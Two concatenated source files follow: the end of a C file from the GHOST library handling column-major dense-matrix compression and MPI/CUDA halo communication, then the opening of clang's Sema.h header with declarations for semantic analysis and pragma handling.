msgcount++;
}
}
}
MPI_CALL_RETURN(MPI_Waitall(msgcount,req,stat));
#else
UNUSED(ctx);
ghost_densemat_init_densemat(totalVec,vec,0,0);
#endif
return GHOST_SUCCESS;
}
ghost_error ghost_densemat_cm_compress(ghost_densemat *vec)
{
if (!(vec->traits.flags & GHOST_DENSEMAT_SCATTERED)) {
return GHOST_SUCCESS;
}
if (vec->traits.location & GHOST_LOCATION_HOST) {
ghost_lidx v,i;
char *val = NULL;
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
GHOST_CALL_RETURN(ghost_malloc_pinned((void **)&val,
(size_t)vec->traits.ncolspadded*DM_NROWSPAD(vec)*
vec->elSize));
} else {
GHOST_CALL_RETURN(ghost_malloc_align((void **)&val,
(size_t)vec->traits.ncolspadded*DM_NROWSPAD(vec)*
vec->elSize,GHOST_DATA_ALIGNMENT));
}
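/* zero-initialize the padded target buffer before gathering the scattered
 * entries into contiguous column-major storage */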
#pragma omp parallel for schedule(runtime) private(v)
for (i=0; i<DM_NROWSPAD(vec); i++)
{
for (v=0; v<vec->traits.ncols; v++)
{
memset(&val[(v*DM_NROWSPAD(vec)+i)*vec->elSize], 0, vec->elSize); /* zero the whole element, not just its first byte */
}
}
DENSEMAT_ITER(vec,memcpy(&val[((col)*DM_NROWSPAD(vec)+(row))*vec->elSize],valptr,vec->elSize));
vec->val = val;
/* for (v=0; v<vec->traits.ncols; v++)
{
memcpy(&val[(v*DM_NROWS(vec)padded)*vec->elSize],
DENSEMAT_VALPTR(vec,0,v),DM_NROWS(vec)padded*vec->elSize);
if (!(vec->traits.flags & GHOST_DENSEMAT_VIEW)) {
free(vec->val[v]);
}
vec->val[v] = &val[(v*DM_NROWS(vec)padded)*vec->elSize];
}*/
}
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
#ifdef GHOST_HAVE_CUDA
char *cu_val;
GHOST_CALL_RETURN(ghost_cu_malloc((void **)&cu_val,DM_NROWSPAD(vec)*vec->traits.ncols*vec->elSize));
DENSEMAT_ITER(vec,ghost_cu_memcpy(&cu_val[(col*DM_NROWSPAD(vec)+row)*vec->elSize], /* row, not col: mirror the host path above */
DENSEMAT_CUVALPTR(vec,memrow,memcol),vec->elSize));
if (!(vec->traits.flags & GHOST_DENSEMAT_VIEW)) {
GHOST_CALL_RETURN(ghost_cu_free(vec->cu_val));
}
vec->cu_val = cu_val;
#endif
}
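/* the densemat now owns compact storage: drop the scatter masks, clear the
 * VIEW/SCATTERED flags and reset the stride to the padded row count */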
ghost_bitmap_free(vec->rowmask); vec->rowmask = NULL;
ghost_bitmap_free(vec->colmask); vec->colmask = NULL;
vec->traits.flags &= ~(ghost_densemat_flags)GHOST_DENSEMAT_VIEW;
vec->traits.flags &= ~(ghost_densemat_flags)GHOST_DENSEMAT_SCATTERED;
vec->stride = DM_NROWSPAD(vec);
vec->src = vec;
return GHOST_SUCCESS;
}
ghost_error ghost_densemat_cm_halocommInit(ghost_densemat *vec, ghost_context *ctx, ghost_densemat_halo_comm *comm)
{
#ifdef GHOST_HAVE_MPI
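/* stage all locally owned entries that remote ranks requested ("dues") into a
 * contiguous work buffer, applying the local column permutation if present;
 * incoming halo data lands directly in vec for the single-column host case
 * and in tmprecv_mem otherwise */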
GHOST_FUNC_ENTER(GHOST_FUNCTYPE_COMMUNICATION);
ghost_error ret = GHOST_SUCCESS;
int i, to_PE, from_PE, partner;
int nprocs, me;
GHOST_CALL_GOTO(ghost_rank(&me, ctx->mpicomm),err,ret);
GHOST_CALL_GOTO(ghost_nrank(&nprocs, ctx->mpicomm),err,ret);
GHOST_CALL_GOTO(ghost_densemat_halocommInit_common(vec,ctx,comm),err,ret);
if (!comm->tmprecv) {
GHOST_CALL_GOTO(ghost_malloc((void **)&comm->tmprecv,nprocs*sizeof(char *)),err,ret);
if (vec->traits.ncols == 1) {
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
#ifdef GHOST_HAVE_GPUDIRECT
for (from_PE=0; from_PE<nprocs; from_PE++) {
comm->tmprecv[from_PE] = DENSEMAT_CUVALPTR(vec,ctx->hput_pos[from_PE],0);
}
#else
GHOST_CALL_GOTO(ghost_malloc((void **)&comm->tmprecv_mem,vec->traits.ncols*vec->elSize*comm->acc_wishes),err,ret);
for (from_PE=0; from_PE<nprocs; from_PE++){
comm->tmprecv[from_PE] = &comm->tmprecv_mem[comm->wishptr[from_PE]*vec->traits.ncols*vec->elSize];
}
GHOST_INSTR_START("hostAlloc")
GHOST_CALL_GOTO(ghost_cu_malloc_pinned((void **)&comm->work,(size_t)vec->traits.ncols*comm->acc_dues*vec->elSize),err,ret);
GHOST_INSTR_STOP("hostAlloc")
#endif
GHOST_INSTR_START("deviceAlloc")
GHOST_CALL_GOTO(ghost_cu_malloc(&comm->cu_work,vec->traits.ncols*comm->acc_dues*vec->elSize),err,ret);
GHOST_INSTR_STOP("deviceAlloc")
} else {
for (from_PE=0; from_PE<nprocs; from_PE++) {
comm->tmprecv[from_PE] = DENSEMAT_VALPTR(vec,ctx->hput_pos[from_PE],0);
}
GHOST_CALL_GOTO(ghost_malloc((void **)&comm->work,(size_t)vec->traits.ncols*comm->acc_dues*vec->elSize),err,ret);
}
} else {
GHOST_CALL_GOTO(ghost_malloc((void **)&comm->tmprecv_mem,vec->traits.ncols*vec->elSize*comm->acc_wishes),err,ret);
for (from_PE=0; from_PE<nprocs; from_PE++){
comm->tmprecv[from_PE] = &comm->tmprecv_mem[comm->wishptr[from_PE]*vec->traits.ncols*vec->elSize];
}
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
GHOST_INSTR_START("hostAlloc")
GHOST_CALL_GOTO(ghost_cu_malloc_pinned((void **)&comm->work,(size_t)vec->traits.ncols*comm->acc_dues*vec->elSize),err,ret);
GHOST_INSTR_STOP("hostAlloc")
GHOST_INSTR_START("deviceAlloc")
GHOST_CALL_GOTO(ghost_cu_malloc(&comm->cu_work,vec->traits.ncols*comm->acc_dues*vec->elSize),err,ret);
GHOST_INSTR_STOP("deviceAlloc")
} else {
GHOST_CALL_GOTO(ghost_malloc((void **)&comm->work,(size_t)vec->traits.ncols*comm->acc_dues*vec->elSize),err,ret);
}
}
}
if (ctx->col_map->loc_perm) {
#ifdef GHOST_HAVE_CUDA
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
ghost_densemat_cu_cm_communicationassembly(comm->cu_work,comm->dueptr,comm->acc_dues,vec,ctx,ctx->col_map->cu_loc_perm);
} else
#endif
if (vec->traits.location & GHOST_LOCATION_HOST) {
ghost_gidx c;
for (partner = 0; partner<ctx->nduepartners; partner++) {
to_PE = ctx->duepartners[partner];
#pragma omp parallel for private(c)
for (i=0; i<ctx->dues[to_PE]; i++){
for (c=0; c<vec->traits.ncols; c++) {
memcpy(comm->work + (c*ctx->dues[to_PE]+comm->dueptr[to_PE]*vec->traits.ncols+i)*vec->elSize,
DENSEMAT_VALPTR(vec,ctx->col_map->loc_perm[ctx->duelist[to_PE][i]],c),vec->elSize);//change to colPerm
}
}
}
}
} else {
#ifdef GHOST_HAVE_CUDA
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
ghost_densemat_cu_cm_communicationassembly(comm->cu_work,comm->dueptr,comm->acc_dues,vec,ctx,NULL);
} else
#endif
if (vec->traits.location & GHOST_LOCATION_HOST) {
ghost_gidx c;
for (partner = 0; partner<ctx->nduepartners; partner++) {
to_PE = ctx->duepartners[partner];
#pragma omp parallel for private(c)
for (i=0; i<ctx->dues[to_PE]; i++){
for (c=0; c<vec->traits.ncols; c++) {
memcpy(comm->work + (c*ctx->dues[to_PE]+comm->dueptr[to_PE]*vec->traits.ncols+i)*vec->elSize,
DENSEMAT_VALPTR(vec,ctx->duelist[to_PE][i],c),vec->elSize);
}
}
}
}
}
#ifdef GHOST_HAVE_CUDA
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
GHOST_INSTR_START("downloadcomm->work");
#ifdef GHOST_TRACK_DATATRANSFERS
ghost_datatransfer_register("spmv_halo",GHOST_DATATRANSFER_IN,GHOST_DATATRANSFER_RANK_GPU,vec->traits.ncols*comm->acc_dues*vec->elSize);
#endif
#ifdef GHOST_HAVE_GPUDIRECT
if (vec->traits.ncols > 1)
#endif
{
ghost_cu_download(comm->work,comm->cu_work,vec->traits.ncols*comm->acc_dues*vec->elSize);
}
GHOST_INSTR_STOP("downloadcomm->work");
}
#endif
goto out;
err:
out:
GHOST_FUNC_EXIT(GHOST_FUNCTYPE_COMMUNICATION);
return ret;
#else
UNUSED(vec);
UNUSED(comm);
UNUSED(ctx);
return GHOST_ERR_NOT_IMPLEMENTED;
#endif
}
ghost_error ghost_densemat_cm_halocommFinalize(ghost_densemat *vec, ghost_context *ctx, ghost_densemat_halo_comm *comm)
{
#ifdef GHOST_HAVE_MPI
GHOST_FUNC_ENTER(GHOST_FUNCTYPE_COMMUNICATION);
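/* unpack the received halo entries from tmprecv into the halo rows of vec
 * (at hput_pos), upload to the GPU if required, then free all buffers */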
ghost_error ret = GHOST_SUCCESS;
int nprocs;
int i, from_PE, partner;
GHOST_CALL_GOTO(ghost_nrank(&nprocs, ctx->mpicomm),err,ret);
ghost_densemat_halocommFinalize_common(comm);
if (vec->traits.location == GHOST_LOCATION_HOST) {
GHOST_INSTR_START("Assemble row-major view");
for (partner=0; partner<ctx->nwishpartners; partner++){
from_PE = ctx->wishpartners[partner];
/* if( (ctx->perm_local) && (ctx->flags & GHOST_PERM_NO_DISTINCTION) ){
//copy to permuted position
for (i=0; i<ctx->wishes[from_PE]; i++){
for (c=0; c<vec->traits.ncols; c++) {
memcpy(DENSEMAT_VALPTR(vec,ctx->perm_local->colPerm[ctx->hput_pos[from_PE]+i],c),
&comm->tmprecv[from_PE][(c*ctx->wishes[from_PE]+i)*vec->elSize],vec->elSize);
}
}
} else { */
for (i=0; i<vec->traits.ncols; i++){
memcpy(DENSEMAT_VALPTR(vec,ctx->hput_pos[from_PE],i),&comm->tmprecv[from_PE][(i*ctx->wishes[from_PE])*vec->elSize],vec->elSize*ctx->wishes[from_PE]);
// }
}
}
GHOST_INSTR_STOP("Assemble row-major view");
}
#ifdef GHOST_HAVE_CUDA
GHOST_INSTR_START("upload")
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
#ifdef GHOST_TRACK_DATATRANSFERS
ghost_datatransfer_register("spmv_halo",GHOST_DATATRANSFER_OUT,GHOST_DATATRANSFER_RANK_GPU,ctx->col_map->nhalo*vec->traits.ncols*vec->elSize);
#endif
#ifdef GHOST_HAVE_GPUDIRECT
if (vec->traits.ncols > 1)
#endif
{
for (from_PE=0; from_PE<nprocs; from_PE++){
ghost_cu_upload2d(DENSEMAT_CUVALPTR(vec,ctx->hput_pos[from_PE],0),vec->stride*vec->elSize,comm->tmprecv[from_PE],ctx->wishes[from_PE]*vec->elSize,ctx->wishes[from_PE]*vec->elSize,vec->traits.ncols);
}
}
}
GHOST_INSTR_STOP("upload");
#endif
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
GHOST_CALL_GOTO(ghost_cu_free(comm->cu_work),err,ret); comm->cu_work = NULL;
GHOST_CALL_GOTO(ghost_cu_free_host(comm->work),err,ret); comm->work = NULL;
} else {
free(comm->work); comm->work = NULL;
}
free(comm->tmprecv_mem); comm->tmprecv_mem = NULL;
free(comm->tmprecv); comm->tmprecv = NULL;
free(comm->request); comm->request = NULL;
free(comm->status); comm->status = NULL;
free(comm->dueptr); comm->dueptr = NULL;
free(comm->wishptr); comm->wishptr = NULL;
goto out;
err:
out:
GHOST_FUNC_EXIT(GHOST_FUNCTYPE_COMMUNICATION);
return ret;
#else
UNUSED(vec);
UNUSED(comm);
UNUSED(ctx);
return GHOST_ERR_NOT_IMPLEMENTED;
#endif
}
|
Sema.h | //===--- Sema.h - Semantic Analysis & AST Building --------------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// This file defines the Sema class, which performs semantic analysis and
// builds ASTs.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_SEMA_SEMA_H
#define LLVM_CLANG_SEMA_SEMA_H
#include "clang/AST/ASTConcept.h"
#include "clang/AST/Attr.h"
#include "clang/AST/Availability.h"
#include "clang/AST/ComparisonCategories.h"
#include "clang/AST/DeclTemplate.h"
#include "clang/AST/DeclarationName.h"
#include "clang/AST/Expr.h"
#include "clang/AST/ExprCXX.h"
#include "clang/AST/ExprObjC.h"
#include "clang/AST/ExternalASTSource.h"
#include "clang/AST/LocInfoType.h"
#include "clang/AST/MangleNumberingContext.h"
#include "clang/AST/NSAPI.h"
#include "clang/AST/PrettyPrinter.h"
#include "clang/AST/StmtCXX.h"
#include "clang/AST/TypeLoc.h"
#include "clang/APINotes/APINotesManager.h"
#include "clang/AST/TypeOrdering.h"
#include "clang/Basic/BitmaskEnum.h"
#include "clang/Basic/ExpressionTraits.h"
#include "clang/Basic/Module.h"
#include "clang/Basic/OpenMPKinds.h"
#include "clang/Basic/PragmaKinds.h"
#include "clang/Basic/Specifiers.h"
#include "clang/Basic/TemplateKinds.h"
#include "clang/Basic/TypeTraits.h"
#include "clang/Sema/AnalysisBasedWarnings.h"
#include "clang/Sema/CleanupInfo.h"
#include "clang/Sema/DeclSpec.h"
#include "clang/Sema/ExternalSemaSource.h"
#include "clang/Sema/IdentifierResolver.h"
#include "clang/Sema/ObjCMethodList.h"
#include "clang/Sema/Ownership.h"
#include "clang/Sema/Scope.h"
#include "clang/Sema/TypoCorrection.h"
#include "clang/Sema/Weak.h"
#include "llvm/ADT/ArrayRef.h"
#include "llvm/ADT/Optional.h"
#include "llvm/ADT/SetVector.h"
#include "llvm/ADT/SmallBitVector.h"
#include "llvm/ADT/SmallPtrSet.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/ADT/TinyPtrVector.h"
#include "llvm/Frontend/OpenMP/OMPConstants.h"
#include <deque>
#include <functional>
#include <memory>
#include <string>
#include <tuple>
#include <vector>
namespace llvm {
class APSInt;
template <typename ValueT> struct DenseMapInfo;
template <typename ValueT, typename ValueInfoT> class DenseSet;
class SmallBitVector;
struct InlineAsmIdentifierInfo;
}
namespace clang {
class ADLResult;
class ASTConsumer;
class ASTContext;
class ASTMutationListener;
class ASTReader;
class ASTWriter;
class ArrayType;
class ParsedAttr;
class BindingDecl;
class BlockDecl;
class CapturedDecl;
class CXXBasePath;
class CXXBasePaths;
class CXXBindTemporaryExpr;
typedef SmallVector<CXXBaseSpecifier*, 4> CXXCastPath;
class CXXConstructorDecl;
class CXXConversionDecl;
class CXXDeleteExpr;
class CXXDestructorDecl;
class CXXFieldCollector;
class CXXMemberCallExpr;
class CXXMethodDecl;
class CXXScopeSpec;
class CXXTemporary;
class CXXTryStmt;
class CallExpr;
class ClassTemplateDecl;
class ClassTemplatePartialSpecializationDecl;
class ClassTemplateSpecializationDecl;
class VarTemplatePartialSpecializationDecl;
class CodeCompleteConsumer;
class CodeCompletionAllocator;
class CodeCompletionTUInfo;
class CodeCompletionResult;
class CoroutineBodyStmt;
class Decl;
class DeclAccessPair;
class DeclContext;
class DeclRefExpr;
class DeclaratorDecl;
class DeducedTemplateArgument;
class DependentDiagnostic;
class DesignatedInitExpr;
class Designation;
class EnableIfAttr;
class EnumConstantDecl;
class Expr;
class ExtVectorType;
class FormatAttr;
class FriendDecl;
class FunctionDecl;
class FunctionProtoType;
class FunctionTemplateDecl;
class ImplicitConversionSequence;
typedef MutableArrayRef<ImplicitConversionSequence> ConversionSequenceList;
class InitListExpr;
class InitializationKind;
class InitializationSequence;
class InitializedEntity;
class IntegerLiteral;
class LabelStmt;
class LambdaExpr;
class LangOptions;
class LocalInstantiationScope;
class LookupResult;
class MacroInfo;
typedef ArrayRef<std::pair<IdentifierInfo *, SourceLocation>> ModuleIdPath;
class ModuleLoader;
class MultiLevelTemplateArgumentList;
class NamedDecl;
class ObjCCategoryDecl;
class ObjCCategoryImplDecl;
class ObjCCompatibleAliasDecl;
class ObjCContainerDecl;
class ObjCImplDecl;
class ObjCImplementationDecl;
class ObjCInterfaceDecl;
class ObjCIvarDecl;
template <class T> class ObjCList;
class ObjCMessageExpr;
class ObjCMethodDecl;
class ObjCPropertyDecl;
class ObjCProtocolDecl;
class OMPThreadPrivateDecl;
class OMPRequiresDecl;
class OMPDeclareReductionDecl;
class OMPDeclareSimdDecl;
class OMPClause;
struct OMPVarListLocTy;
struct OverloadCandidate;
enum class OverloadCandidateParamOrder : char;
enum OverloadCandidateRewriteKind : unsigned;
class OverloadCandidateSet;
class OverloadExpr;
class ParenListExpr;
class ParmVarDecl;
class Preprocessor;
class PseudoDestructorTypeStorage;
class PseudoObjectExpr;
class QualType;
class StandardConversionSequence;
class Stmt;
class StringLiteral;
class SwitchStmt;
class TemplateArgument;
class TemplateArgumentList;
class TemplateArgumentLoc;
class TemplateDecl;
class TemplateInstantiationCallback;
class TemplateParameterList;
class TemplatePartialOrderingContext;
class TemplateTemplateParmDecl;
class Token;
class TypeAliasDecl;
class TypedefDecl;
class TypedefNameDecl;
class TypeLoc;
class TypoCorrectionConsumer;
class UnqualifiedId;
class UnresolvedLookupExpr;
class UnresolvedMemberExpr;
class UnresolvedSetImpl;
class UnresolvedSetIterator;
class UsingDecl;
class UsingShadowDecl;
class ValueDecl;
class VarDecl;
class VarTemplateSpecializationDecl;
class VisibilityAttr;
class VisibleDeclConsumer;
class IndirectFieldDecl;
struct DeductionFailureInfo;
class TemplateSpecCandidateSet;
namespace sema {
class AccessedEntity;
class BlockScopeInfo;
class Capture;
class CapturedRegionScopeInfo;
class CapturingScopeInfo;
class CompoundScopeInfo;
class DelayedDiagnostic;
class DelayedDiagnosticPool;
class FunctionScopeInfo;
class LambdaScopeInfo;
class PossiblyUnreachableDiag;
class SemaPPCallbacks;
class TemplateDeductionInfo;
}
namespace threadSafety {
class BeforeSet;
void threadSafetyCleanup(BeforeSet* Cache);
}
// FIXME: No way to easily map from TemplateTypeParmTypes to
// TemplateTypeParmDecls, so we have this horrible PointerUnion.
typedef std::pair<llvm::PointerUnion<const TemplateTypeParmType*, NamedDecl*>,
SourceLocation> UnexpandedParameterPack;
/// Describes whether we've seen any nullability information for the given
/// file.
struct FileNullability {
/// The first pointer declarator (of any pointer kind) in the file that does
/// not have a corresponding nullability annotation.
SourceLocation PointerLoc;
/// The end location for the first pointer declarator in the file. Used for
/// placing fix-its.
SourceLocation PointerEndLoc;
/// Which kind of pointer declarator we saw.
uint8_t PointerKind;
/// Whether we saw any type nullability annotations in the given file.
bool SawTypeNullability = false;
};
/// A mapping from file IDs to a record of whether we've seen nullability
/// information in that file.
class FileNullabilityMap {
/// A mapping from file IDs to the nullability information for each file ID.
llvm::DenseMap<FileID, FileNullability> Map;
/// A single-element cache based on the file ID.
struct {
FileID File;
FileNullability Nullability;
} Cache;
public:
FileNullability &operator[](FileID file) {
// Check the single-element cache.
if (file == Cache.File)
return Cache.Nullability;
// It's not in the single-element cache; flush the cache if we have one.
if (!Cache.File.isInvalid()) {
Map[Cache.File] = Cache.Nullability;
}
// Pull this entry into the cache.
Cache.File = file;
Cache.Nullability = Map[file];
return Cache.Nullability;
}
};
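// Editorial usage sketch (not part of the original header; `NullMap` and
// `FID` are hypothetical): the single-element cache makes repeated lookups
// for the same FileID cheap before falling back to the DenseMap.
//
//   FileNullability &FN = NullMap[FID];
//   if (FN.PointerLoc.isInvalid())
//     FN.PointerLoc = PtrLoc; // remember the first unannotated pointer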
/// Keeps track of the expected type during expression parsing. The type is
/// tied to a particular token; all functions that update or consume the type
/// take the start location of the token they are looking at as a parameter.
/// This allows us to avoid updating the type on hot paths in the parser.
class PreferredTypeBuilder {
public:
PreferredTypeBuilder() = default;
explicit PreferredTypeBuilder(QualType Type) : Type(Type) {}
void enterCondition(Sema &S, SourceLocation Tok);
void enterReturn(Sema &S, SourceLocation Tok);
void enterVariableInit(SourceLocation Tok, Decl *D);
/// Computing a type for the function argument may require running
/// overloading, so we postpone its computation until it is actually needed.
///
/// Clients should be very careful when using this function: because it stores
/// a function_ref, they must make sure that all calls to get() with the same
/// location happen while that function_ref is still alive.
void enterFunctionArgument(SourceLocation Tok,
llvm::function_ref<QualType()> ComputeType);
void enterParenExpr(SourceLocation Tok, SourceLocation LParLoc);
void enterUnary(Sema &S, SourceLocation Tok, tok::TokenKind OpKind,
SourceLocation OpLoc);
void enterBinary(Sema &S, SourceLocation Tok, Expr *LHS, tok::TokenKind Op);
void enterMemAccess(Sema &S, SourceLocation Tok, Expr *Base);
void enterSubscript(Sema &S, SourceLocation Tok, Expr *LHS);
/// Handles all type casts, including C-style cast, C++ casts, etc.
void enterTypeCast(SourceLocation Tok, QualType CastType);
QualType get(SourceLocation Tok) const {
if (Tok != ExpectedLoc)
return QualType();
if (!Type.isNull())
return Type;
if (ComputeType)
return ComputeType();
return QualType();
}
private:
/// Start position of a token for which we store expected type.
SourceLocation ExpectedLoc;
/// Expected type for a token starting at ExpectedLoc.
QualType Type;
/// A function to compute expected type at ExpectedLoc. It is only considered
/// if Type is null.
llvm::function_ref<QualType()> ComputeType;
};
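// Editorial usage sketch (hypothetical parser code): the builder only answers
// for the exact token location it was primed with; any other location yields
// a null QualType.
//
//   PT.enterTypeCast(Tok.getLocation(), CastTy);
//   QualType Hit  = PT.get(Tok.getLocation()); // CastTy
//   QualType Miss = PT.get(OtherLoc);          // QualType()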
/// Sema - This implements semantic analysis and AST building for C.
class Sema final {
Sema(const Sema &) = delete;
void operator=(const Sema &) = delete;
/// A key method to reduce duplicate debug info from Sema.
virtual void anchor();
/// Source of additional semantic information.
ExternalSemaSource *ExternalSource;
/// Whether Sema has generated a multiplexer and has to delete it.
bool isMultiplexExternalSource;
static bool mightHaveNonExternalLinkage(const DeclaratorDecl *FD);
bool isVisibleSlow(const NamedDecl *D);
/// Determine whether two declarations should be linked together, given that
/// the old declaration might not be visible and the new declaration might
/// not have external linkage.
bool shouldLinkPossiblyHiddenDecl(const NamedDecl *Old,
const NamedDecl *New) {
if (isVisible(Old))
return true;
// See comment in below overload for why it's safe to compute the linkage
// of the new declaration here.
if (New->isExternallyDeclarable()) {
assert(Old->isExternallyDeclarable() &&
"should not have found a non-externally-declarable previous decl");
return true;
}
return false;
}
bool shouldLinkPossiblyHiddenDecl(LookupResult &Old, const NamedDecl *New);
void setupImplicitSpecialMemberType(CXXMethodDecl *SpecialMem,
QualType ResultTy,
ArrayRef<QualType> Args);
public:
typedef OpaquePtr<DeclGroupRef> DeclGroupPtrTy;
typedef OpaquePtr<TemplateName> TemplateTy;
typedef OpaquePtr<QualType> TypeTy;
OpenCLOptions OpenCLFeatures;
FPOptions FPFeatures;
const LangOptions &LangOpts;
Preprocessor &PP;
ASTContext &Context;
ASTConsumer &Consumer;
DiagnosticsEngine &Diags;
SourceManager &SourceMgr;
api_notes::APINotesManager APINotes;
/// Flag indicating whether or not to collect detailed statistics.
bool CollectStats;
/// Code-completion consumer.
CodeCompleteConsumer *CodeCompleter;
/// CurContext - This is the current declaration context of parsing.
DeclContext *CurContext;
/// Generally null except when we temporarily switch decl contexts,
/// like in \see ActOnObjCTemporaryExitContainerContext.
DeclContext *OriginalLexicalContext;
/// VAListTagName - The declaration name corresponding to __va_list_tag.
/// This is used as part of a hack to omit that class from ADL results.
DeclarationName VAListTagName;
bool MSStructPragmaOn; // True when \#pragma ms_struct on
/// Controls member pointer representation format under the MS ABI.
LangOptions::PragmaMSPointersToMembersKind
MSPointerToMemberRepresentationMethod;
/// Stack of active SEH __finally scopes. Can be empty.
SmallVector<Scope*, 2> CurrentSEHFinally;
/// Source location for newly created implicit MSInheritanceAttrs
SourceLocation ImplicitMSInheritanceAttrLoc;
/// Holds TypoExprs that are created from `createDelayedTypo`. This is used by
/// `TransformTypos` in order to keep track of any TypoExprs that are created
/// recursively during typo correction and wipe them away if the correction
/// fails.
llvm::SmallVector<TypoExpr *, 2> TypoExprs;
/// pragma clang section kind
enum PragmaClangSectionKind {
PCSK_Invalid = 0,
PCSK_BSS = 1,
PCSK_Data = 2,
PCSK_Rodata = 3,
PCSK_Text = 4,
PCSK_Relro = 5
};
enum PragmaClangSectionAction {
PCSA_Set = 0,
PCSA_Clear = 1
};
struct PragmaClangSection {
std::string SectionName;
bool Valid = false;
SourceLocation PragmaLocation;
void Act(SourceLocation PragmaLocation,
PragmaClangSectionAction Action,
StringLiteral* Name);
};
PragmaClangSection PragmaClangBSSSection;
PragmaClangSection PragmaClangDataSection;
PragmaClangSection PragmaClangRodataSection;
PragmaClangSection PragmaClangRelroSection;
PragmaClangSection PragmaClangTextSection;
enum PragmaMsStackAction {
PSK_Reset = 0x0, // #pragma ()
PSK_Set = 0x1, // #pragma (value)
PSK_Push = 0x2, // #pragma (push[, id])
PSK_Pop = 0x4, // #pragma (pop[, id])
PSK_Show = 0x8, // #pragma (show) -- only for "pack"!
PSK_Push_Set = PSK_Push | PSK_Set, // #pragma (push[, id], value)
PSK_Pop_Set = PSK_Pop | PSK_Set, // #pragma (pop[, id], value)
};
template<typename ValueType>
struct PragmaStack {
struct Slot {
llvm::StringRef StackSlotLabel;
ValueType Value;
SourceLocation PragmaLocation;
SourceLocation PragmaPushLocation;
Slot(llvm::StringRef StackSlotLabel, ValueType Value,
SourceLocation PragmaLocation, SourceLocation PragmaPushLocation)
: StackSlotLabel(StackSlotLabel), Value(Value),
PragmaLocation(PragmaLocation),
PragmaPushLocation(PragmaPushLocation) {}
};
void Act(SourceLocation PragmaLocation,
PragmaMsStackAction Action,
llvm::StringRef StackSlotLabel,
ValueType Value);
// MSVC seems to add artificial slots to #pragma stacks on entering a C++
// method body to restore the stacks on exit, so it works like this:
//
// struct S {
// #pragma <name>(push, InternalPragmaSlot, <current_pragma_value>)
// void Method {}
// #pragma <name>(pop, InternalPragmaSlot)
// };
//
// It works even with #pragma vtordisp, although MSVC doesn't support
// #pragma vtordisp(push [, id], n)
// syntax.
//
// Push / pop a named sentinel slot.
void SentinelAction(PragmaMsStackAction Action, StringRef Label) {
assert((Action == PSK_Push || Action == PSK_Pop) &&
"Can only push / pop #pragma stack sentinels!");
Act(CurrentPragmaLocation, Action, Label, CurrentValue);
}
// Constructors.
explicit PragmaStack(const ValueType &Default)
: DefaultValue(Default), CurrentValue(Default) {}
bool hasValue() const { return CurrentValue != DefaultValue; }
SmallVector<Slot, 2> Stack;
ValueType DefaultValue; // Value used for PSK_Reset action.
ValueType CurrentValue;
SourceLocation CurrentPragmaLocation;
};
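// Editorial usage sketch (hypothetical handler for
// "#pragma pack(push, label, 8)"): PSK_Push_Set pushes the current value and
// installs the new one; a matching PSK_Pop restores the saved value.
//
//   PackStack.Act(PragmaLoc, PSK_Push_Set, "label", 8u);
//   ...
//   PackStack.Act(PragmaLoc, PSK_Pop, "label", 0u);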
// FIXME: We should serialize / deserialize these if they occur in a PCH (but
// we shouldn't do so if they're in a module).
/// Whether to insert vtordisps prior to virtual bases in the Microsoft
/// C++ ABI. Possible values are 0, 1, and 2, which mean:
///
/// 0: Suppress all vtordisps
/// 1: Insert vtordisps in the presence of vbase overrides and non-trivial
/// structors
/// 2: Always insert vtordisps to support RTTI on partially constructed
/// objects
PragmaStack<MSVtorDispMode> VtorDispStack;
// #pragma pack.
// Sentinel to represent when the stack is set to mac68k alignment.
static const unsigned kMac68kAlignmentSentinel = ~0U;
PragmaStack<unsigned> PackStack;
// The current #pragma pack values and locations at each #include.
struct PackIncludeState {
unsigned CurrentValue;
SourceLocation CurrentPragmaLocation;
bool HasNonDefaultValue, ShouldWarnOnInclude;
};
SmallVector<PackIncludeState, 8> PackIncludeStack;
// Segment #pragmas.
PragmaStack<StringLiteral *> DataSegStack;
PragmaStack<StringLiteral *> BSSSegStack;
PragmaStack<StringLiteral *> ConstSegStack;
PragmaStack<StringLiteral *> CodeSegStack;
// RAII object to push / pop sentinel slots for all MS #pragma stacks.
// Actions should be performed only if we enter / exit a C++ method body.
class PragmaStackSentinelRAII {
public:
PragmaStackSentinelRAII(Sema &S, StringRef SlotLabel, bool ShouldAct);
~PragmaStackSentinelRAII();
private:
Sema &S;
StringRef SlotLabel;
bool ShouldAct;
};
/// A mapping that describes the nullability we've seen in each header file.
FileNullabilityMap NullabilityMap;
/// Last section used with #pragma init_seg.
StringLiteral *CurInitSeg;
SourceLocation CurInitSegLoc;
/// VisContext - Manages the stack for \#pragma GCC visibility.
void *VisContext; // Really a "PragmaVisStack*"
/// This an attribute introduced by \#pragma clang attribute.
struct PragmaAttributeEntry {
SourceLocation Loc;
ParsedAttr *Attribute;
SmallVector<attr::SubjectMatchRule, 4> MatchRules;
bool IsUsed;
};
/// A push'd group of PragmaAttributeEntries.
struct PragmaAttributeGroup {
/// The location of the push attribute.
SourceLocation Loc;
/// The namespace of this push group.
const IdentifierInfo *Namespace;
SmallVector<PragmaAttributeEntry, 2> Entries;
};
SmallVector<PragmaAttributeGroup, 2> PragmaAttributeStack;
/// The declaration that is currently receiving an attribute from the
/// #pragma attribute stack.
const Decl *PragmaAttributeCurrentTargetDecl;
/// This represents the last location of a "#pragma clang optimize off"
/// directive if such a directive has not been closed by an "on" yet. If
/// optimizations are currently "on", this is set to an invalid location.
SourceLocation OptimizeOffPragmaLocation;
/// Flag indicating if Sema is building a recovery call expression.
///
/// This flag is used to avoid building recovery call expressions
/// if Sema is already doing so, which would cause infinite recursions.
bool IsBuildingRecoveryCallExpr;
/// Used to control the generation of ExprWithCleanups.
CleanupInfo Cleanup;
/// ExprCleanupObjects - This is the stack of objects requiring
/// cleanup that are created by the current full expression. The
/// element type here is ExprWithCleanups::Object.
SmallVector<BlockDecl*, 8> ExprCleanupObjects;
